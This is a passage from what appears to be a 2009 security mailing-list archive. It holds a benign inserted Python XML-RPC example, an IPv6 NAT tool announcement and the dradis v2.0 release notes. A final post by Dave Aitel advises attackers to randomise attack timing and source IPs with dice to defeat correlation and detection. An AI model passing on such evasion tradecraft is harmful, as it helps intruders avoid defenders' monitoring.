Holy crap! I know we used to joke about that but I didn't think he was actually a spy. That place was good.
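The "Hello Microsofties!" thread above describes one XML-RPC API with many consumers (a Visio action, a web app, a thick client). The following is an added example written for this archive, not CANVAS code or anything from Immunity: a small XML-RPC service backed by a constructed in-memory inventory, consumed by two different clients, a colour-by-OS mapper of the kind a Visio right-click would call and a patch-status report. The method names (list_hosts, os_of, patch_status), the hosts and the patch states are all assumptions made for the example.

```python
"""Added example: one XML-RPC service, two consumers.

Illustrative code only; the method names, hosts and patch states are
constructed for this example and are not the real CANVAS XML-RPC API.
"""
import threading
from xmlrpc.client import Fault, ServerProxy
from xmlrpc.server import SimpleXMLRPCServer

# Constructed sample data standing in for what a real engine would know.
INVENTORY = {
    "10.0.0.5": {"os": "Windows 2003", "bulletins": {"MS08-067": "vulnerable"}},
    "10.0.0.6": {"os": "Linux 2.6", "bulletins": {}},
    "10.0.0.7": {"os": "Windows XP", "bulletins": {"MS08-067": "patched"}},
}


class InventoryAPI:
    """Exactly the methods exported over XML-RPC (public names only)."""

    def list_hosts(self):
        return sorted(INVENTORY)

    def os_of(self, host):
        # A KeyError here becomes an XML-RPC Fault on the wire for unknown hosts.
        return INVENTORY[host]["os"]

    def patch_status(self, host, bulletin):
        # Non-Windows hosts report "n/a" rather than a misleading "vulnerable".
        entry = INVENTORY[host]
        if not entry["os"].startswith("Windows"):
            return "n/a"
        return entry["bulletins"].get(bulletin, "unknown")


def start_server():
    """Bind to loopback on an ephemeral port and serve from a background thread."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    server.register_instance(InventoryAPI())
    # Deliberately no register_introspection_functions(): clients get the
    # documented methods and nothing to enumerate.
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/" % server.server_address[1]


# Consumer 1: the Visio-style "colour every machine by OS family" action.
OS_COLOURS = {"Windows": "red", "Linux": "blue"}


def colour_map(url):
    api = ServerProxy(url)
    colours = {}
    for host in api.list_hosts():
        family = api.os_of(host).split()[0]
        colours[host] = OS_COLOURS.get(family, "grey")
    return colours


# Consumer 2: a command-line "is it patched?" report over the same API.
def patch_report(url, bulletin):
    api = ServerProxy(url)
    return {h: api.patch_status(h, bulletin) for h in api.list_hosts()}


def safe_os_of(url, host):
    """Client-side handling of the Fault the server raises for an unknown host."""
    try:
        return ServerProxy(url).os_of(host)
    except Fault:
        return None


def demo():
    """Run both consumers against a live server and return their results."""
    server, url = start_server()
    try:
        colours = colour_map(url)
        report = patch_report(url, "MS08-067")
        unknown = safe_os_of(url, "192.0.2.1")  # constructed host, not in inventory
    finally:
        server.shutdown()
        server.server_close()
    return colours, report, unknown


if __name__ == "__main__":
    print(demo())
```

Run it directly to see both consumers' output against the same service. The server binds to loopback only and registers no introspection functions, so a client learns only the methods you document; anything that exposes real engine actions over XML-RPC also needs authentication and TLS in front of it, which this example leaves out.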
From krahmer at suse.de Wed Jan 28 08:02:49 2009
From: krahmer at suse.de (Sebastian Krahmer)
Date: Wed, 28 Jan 2009 14:02:49 +0100
Subject: [Dailydave] IPv6 NAT
Message-ID: <20090128130249.GA15129@suse.de>

Hi,

For those who were missing NAT for IPv6 to test the latest duplicate X509 root-certificate attacks as demonstrated recently, you can find ip6nat here:
http://c-skills.blogspot.com/2009/01/ipv6-nat.html

Sebastian

--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From etd at nomejortu.com Thu Jan 29 18:19:07 2009
From: etd at nomejortu.com (etd)
Date: Thu, 29 Jan 2009 23:19:07 +0000
Subject: [Dailydave] [tool] dradis v2.0 released
Message-ID: <4982396B.7090803@nomejortu.com>

What is dradis?
---------------------------------------------------
- dradis is an open source tool for sharing information during security assessments.
- It provides a centralized repository of information to keep track of what has been done so far, and what is still ahead.
- Client/server architecture with a web interface

Why should I care?
---------------------------------------------------
- If you are in a lengthy engagement, having all the information in one place will make things easier. Everyone is on the same page.
- If your team changes (i.e. someone joins halfway through), it will be useful to bring them up to speed.
- It's flexible, you don't need to adapt your methodology to use it.
- It provides a web service interface so you can connect it with your existing vulnerability database or reporting tool.

What does it look like? Where do I get more info.?
---------------------------------------------------
- Flash demo: http://dradis.nomejortu.com/videos/dradis2-01.html
- Screenshots: http://dradis.nomejortu.com/screenshots.html
- Project info:
  http://sourceforge.net/projects/dradis
  http://freshmeat.net/projects/dradis
  http://dradis.sourceforge.net/
- More info, changelog, features: http://usefulfor.com/security/2009/01/30/dradis-v2

From dave.aitel at gmail.com Sat Jan 31 18:17:01 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Sat, 31 Jan 2009 18:17:01 -0500
Subject: [Dailydave] Sunday sunday sunday!
Message-ID:

If we were in Unethical Hacking class today I'd be pointing out that tomorrow night is a good time to hack, because no "American" would be hacking during the Super Bowl, surely!

When you hack, it's always the same way on your end. You've got three major windows. The top left is your plan of action (aka, a script). The top right is output. The top middle is input (Get two screens!). The bottom is network dump (ideally colorized, but tcpdump -n will do in a pinch, no?).

But you never hack on a schedule. In this regard a simple pair of dice can be your most powerful weapon against both automated and manual correlation and analysis. Going active? Let the dice pick when, and which IPs you're attacking from. Of course, if it happens to be during the Super Bowl, so much the better.

It's called a Discipline for a reason. :>

-dave